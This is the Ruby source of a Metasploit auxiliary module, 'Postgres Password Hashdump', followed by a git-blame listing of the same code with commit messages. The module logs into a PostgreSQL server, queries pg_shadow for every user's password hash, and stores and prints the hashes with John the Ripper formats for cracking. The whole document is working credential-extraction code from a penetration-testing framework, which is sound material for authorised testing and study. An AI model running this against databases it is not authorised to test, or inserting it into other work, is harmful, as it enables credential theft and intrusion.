modules/auxiliary/scanner/postgres/postgres_hashdump.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Postgres
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::OptionalSession::PostgreSQL

  def initialize
    super(
      'Name'           => 'Postgres Password Hashdump',
      'Description'    => %Q{
          This module extracts the usernames and encrypted password
        hashes from a Postgres server and stores them for later cracking.
      },
      'Author'         => ['theLightCosine'],
      'License'        => MSF_LICENSE
    )
    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')

  end

  def username
    session ? session.client.params['username'] : datastore['USERNAME']
  end

  def database
    session ? session.client.params['database'] : datastore['DATABASE']
  end

  def password
    # The session or its client doesn't store the password
    session ? nil : datastore['PASSWORD']
  end

  def run_host(ip)
    self.postgres_conn = session.client if session
    # Query the Postgres Shadow table for username and password hashes and report them
    res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)

    service_data = {
        address: postgres_conn.peerhost,
        port: postgres_conn.peerport,
        service_name: 'postgres',
        protocol: 'tcp',
        workspace_id: myworkspace_id
    }

    credential_data = {
        module_fullname: self.fullname,
        origin_type: :service,
        private_data: password,
        private_type: :password,
        username: username,
        realm_key:  Metasploit::Model::Realm::Key::POSTGRESQL_DATABASE,
        realm_value: database
    }

    credential_data.merge!(service_data)

    # Error handling routine here, borrowed heavily from todb
    case res.keys[0]
    when :conn_error
      print_error("A Connection Error Occurred")
      return
    when :sql_error
      # We know the credentials worked but something else went wrong
      credential_core = create_credential(credential_data)
      login_data = {
          core: credential_core,
          last_attempted_at: DateTime.now,
          status: Metasploit::Model::Login::Status::SUCCESSFUL
      }
      login_data.merge!(service_data)
      create_credential_login(login_data)

      case res[:sql_error]
      when /^C42501/
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Insufficient permissions."
        return
      else
        print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{res[:sql_error]}"
        return
      end
    when :complete
      credential_core = create_credential(credential_data)
      login_data = {
          core: credential_core,
          last_attempted_at: DateTime.now,
          status: Metasploit::Model::Login::Status::SUCCESSFUL
      }
      login_data.merge!(service_data)
      # We know the credentials worked and have admin access because we got the hashes
      login_data[:access_level] = 'Admin'
      create_credential_login(login_data)
      print_good("Query appears to have run successfully")
    end


    tbl = Rex::Text::Table.new(
      'Header'  => 'Postgres Server Hashes',
      'Indent'   => 1,
      'Columns' => ['Username', 'Hash']
    )

    service_data = {
        address: postgres_conn.peerhost,
        port: postgres_conn.peerport,
        service_name: 'postgres',
        protocol: 'tcp',
        workspace_id: myworkspace_id
    }

    res[:complete].rows.each do |row|
      next if row[0].nil? or row[1].nil?
      next if row[0].empty? or row[1].empty?

      password = row[1]

      credential_data = {
        origin_type: :service,
        module_fullname: self.fullname,
        private_data: password,
        username: row[0]
      }

      if password.start_with?('md5')
        credential_data[:private_type] = :postgres_md5
        credential_data[:jtr_format] = 'raw-md5,postgres'
      else
        credential_data[:private_type] = :nonreplayable_hash
      end

      credential_data.merge!(service_data)

      credential_core = create_credential(credential_data)
      login_data = {
          core: credential_core,
          status: Metasploit::Model::Login::Status::UNTRIED
      }
      login_data.merge!(service_data)
      create_credential_login(login_data)

      tbl << [row[0], password]
    end
    print_good("#{tbl.to_s}")

    postgres_logout if self.postgres_conn && session.blank?
  end

end
Fixes #5404 2011-10-10 17:05:01 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Fixes #5404 2011-10-10 17:05:01 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Fixes #5404 2011-10-10 17:05:01 +00:00			`include Msf::Exploit::Remote::Postgres`
			`include Msf::Auxiliary::Report`
			`include Msf::Auxiliary::Scanner`
Use individual session mixins 2024-02-12 11:52:48 +00:00			`include Msf::OptionalSession::PostgreSQL`
Retab modules 2013-08-30 16:28:54 -05:00
Fixes #5404 2011-10-10 17:05:01 +00:00			`def initialize`
			`super(`
			`'Name' => 'Postgres Password Hashdump',`
			`'Description' => %Q{`
			`This module extracts the usernames and encrypted password`
msftidy on aux modules, see #5749 2011-11-20 13:12:07 +11:00			`hashes from a Postgres server and stores them for later cracking.`
Fixes #5404 2011-10-10 17:05:01 +00:00			`},`
updated all my authour refs to use an alias 2012-09-19 21:46:14 -05:00			`'Author' => ['theLightCosine'],`
Removes session types from module with session type mixin 2024-02-19 10:34:16 +00:00			`'License' => MSF_LICENSE`
Fixes #5404 2011-10-10 17:05:01 +00:00			`)`
			`deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')`
Retab modules 2013-08-30 16:28:54 -05:00
Fixes #5404 2011-10-10 17:05:01 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Use PostgreSQL session type for modules 2024-01-24 13:47:22 +00:00			`def username`
			`session ? session.client.params['username'] : datastore['USERNAME']`
			`end`

			`def database`
			`session ? session.client.params['database'] : datastore['DATABASE']`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Use PostgreSQL session type for modules 2024-01-24 13:47:22 +00:00			`def password`
			`# The session or its client doesn't store the password`
			`session ? nil : datastore['PASSWORD']`
			`end`

			`def run_host(ip)`
			`self.postgres_conn = session.client if session`
yard doc and comment corrections for auxiliary 2015-04-03 16:12:23 +05:00			`# Query the Postgres Shadow table for username and password hashes and report them`
Fixes #5404 2011-10-10 17:05:01 +00:00			`res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)`
Retab modules 2013-08-30 16:28:54 -05:00
refactor postgres hash cracking 2014-06-23 12:02:39 -05:00			`service_data = {`
Align SQL sessions peerhost and peerport 2024-02-19 10:57:53 +00:00			`address: postgres_conn.peerhost,`
			`port: postgres_conn.peerport,`
refactor postgres hash cracking 2014-06-23 12:02:39 -05:00			`service_name: 'postgres',`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`module_fullname: self.fullname,`
			`origin_type: :service,`
Use PostgreSQL session type for modules 2024-01-24 13:47:22 +00:00			`private_data: password,`
refactor postgres hash cracking 2014-06-23 12:02:39 -05:00			`private_type: :password,`
Use PostgreSQL session type for modules 2024-01-24 13:47:22 +00:00			`username: username,`
Credential -> Model for realm key constants 2014-07-10 14:30:25 -05:00			`realm_key: Metasploit::Model::Realm::Key::POSTGRESQL_DATABASE,`
Use PostgreSQL session type for modules 2024-01-24 13:47:22 +00:00			`realm_value: database`
refactor postgres hash cracking 2014-06-23 12:02:39 -05:00			`}`

			`credential_data.merge!(service_data)`

yard doc and comment corrections for auxiliary 2015-04-03 16:12:23 +05:00			`# Error handling routine here, borrowed heavily from todb`
Fixes #5404 2011-10-10 17:05:01 +00:00			`case res.keys[0]`
			`when :conn_error`
Fix various typos 2017-07-21 07:40:08 -07:00			`print_error("A Connection Error Occurred")`
Fixes #5404 2011-10-10 17:05:01 +00:00			`return`
			`when :sql_error`
refactor postgres hash cracking 2014-06-23 12:02:39 -05:00			`# We know the credentials worked but something else went wrong`
			`credential_core = create_credential(credential_data)`
			`login_data = {`
			`core: credential_core,`
			`last_attempted_at: DateTime.now,`
Resolves some Login::Status migration issues 2014-07-16 21:52:08 -05:00			`status: Metasploit::Model::Login::Status::SUCCESSFUL`
refactor postgres hash cracking 2014-06-23 12:02:39 -05:00			`}`
			`login_data.merge!(service_data)`
			`create_credential_login(login_data)`

Fixes #5404 2011-10-10 17:05:01 +00:00			`case res[:sql_error]`
			`when /^C42501/`
Align SQL sessions peerhost and peerport 2024-02-19 10:57:53 +00:00			`print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - Insufficient permissions."`
Fixes #5404 2011-10-10 17:05:01 +00:00			`return`
			`else`
Align SQL sessions peerhost and peerport 2024-02-19 10:57:53 +00:00			`print_error "#{postgres_conn.peerhost}:#{postgres_conn.peerport} Postgres - #{res[:sql_error]}"`
Fixes #5404 2011-10-10 17:05:01 +00:00			`return`
			`end`
			`when :complete`
refactor postgres hash cracking 2014-06-23 12:02:39 -05:00			`credential_core = create_credential(credential_data)`
			`login_data = {`
			`core: credential_core,`
			`last_attempted_at: DateTime.now,`
Resolves some Login::Status migration issues 2014-07-16 21:52:08 -05:00			`status: Metasploit::Model::Login::Status::SUCCESSFUL`
refactor postgres hash cracking 2014-06-23 12:02:39 -05:00			`}`
			`login_data.merge!(service_data)`
			`# We know the credentials worked and have admin access because we got the hashes`
			`login_data[:access_level] = 'Admin'`
			`create_credential_login(login_data)`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_good("Query appears to have run successfully")`
Fixes #5404 2011-10-10 17:05:01 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

replace old rex::ui::text::table refs 2016-08-10 13:30:09 -05:00			`tbl = Rex::Text::Table.new(`
Fixes #5404 2011-10-10 17:05:01 +00:00			`'Header' => 'Postgres Server Hashes',`
Fix to typo in the tables being pushed. 2011-11-21 15:49:57 -08:00			`'Indent' => 1,`
Fixes #5404 2011-10-10 17:05:01 +00:00			`'Columns' => ['Username', 'Hash']`
			`)`
Retab modules 2013-08-30 16:28:54 -05:00
refactor psotgres_hashdump 2014-06-04 12:21:49 -05:00			`service_data = {`
Align SQL sessions peerhost and peerport 2024-02-19 10:57:53 +00:00			`address: postgres_conn.peerhost,`
			`port: postgres_conn.peerport,`
refactor psotgres_hashdump 2014-06-04 12:21:49 -05:00			`service_name: 'postgres',`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

Fixes #5404 2011-10-10 17:05:01 +00:00			`res[:complete].rows.each do \|row\|`
			`next if row[0].nil? or row[1].nil?`
			`next if row[0].empty? or row[1].empty?`
Updates Postgres hashdump module to now work with newer versions of Postgres 2024-03-12 16:13:04 +00:00
Fixes #5404 2011-10-10 17:05:01 +00:00			`password = row[1]`
Retab modules 2013-08-30 16:28:54 -05:00
Updates Postgres hashdump module to now work with newer versions of Postgres 2024-03-12 16:13:04 +00:00			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: self.fullname,`
			`private_data: password,`
			`username: row[0]`
			`}`

			`if password.start_with?('md5')`
			`credential_data[:private_type] = :postgres_md5`
			`credential_data[:jtr_format] = 'raw-md5,postgres'`
			`else`
			`credential_data[:private_type] = :nonreplayable_hash`
			`end`

			`credential_data.merge!(service_data)`
Retab modules 2013-08-30 16:28:54 -05:00
refactor psotgres_hashdump 2014-06-04 12:21:49 -05:00			`credential_core = create_credential(credential_data)`
			`login_data = {`
			`core: credential_core,`
Resolves some Login::Status migration issues 2014-07-16 21:52:08 -05:00			`status: Metasploit::Model::Login::Status::UNTRIED`
refactor psotgres_hashdump 2014-06-04 12:21:49 -05:00			`}`
			`login_data.merge!(service_data)`
			`create_credential_login(login_data)`
Retab modules 2013-08-30 16:28:54 -05:00
refactor psotgres_hashdump 2014-06-04 12:21:49 -05:00			`tbl << [row[0], password]`
			`end`
			`print_good("#{tbl.to_s}")`
Retab modules 2013-08-30 16:28:54 -05:00
Use PostgreSQL session type for modules 2024-01-24 13:47:22 +00:00			`postgres_logout if self.postgres_conn && session.blank?`
Fixes #5404 2011-10-10 17:05:01 +00:00			`end`

			`end`